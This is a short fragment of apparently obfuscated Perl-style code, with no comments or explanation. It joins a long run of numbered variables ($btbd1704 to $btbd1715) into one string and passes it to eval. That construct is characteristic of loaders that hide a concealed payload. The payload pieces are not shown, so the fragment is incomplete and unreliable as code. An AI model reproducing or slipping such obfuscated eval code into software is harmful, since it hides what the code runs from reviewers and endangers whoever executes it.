$btbd1704.
$btbd1705.$btbd1706.$btbd1707.$btbd1708.$btbd1709.$btbd1710.
$btbd1711.$btbd1712.$btbd1713.$btbd1714.
$btbd1715;$c='btbd';eval $btbd;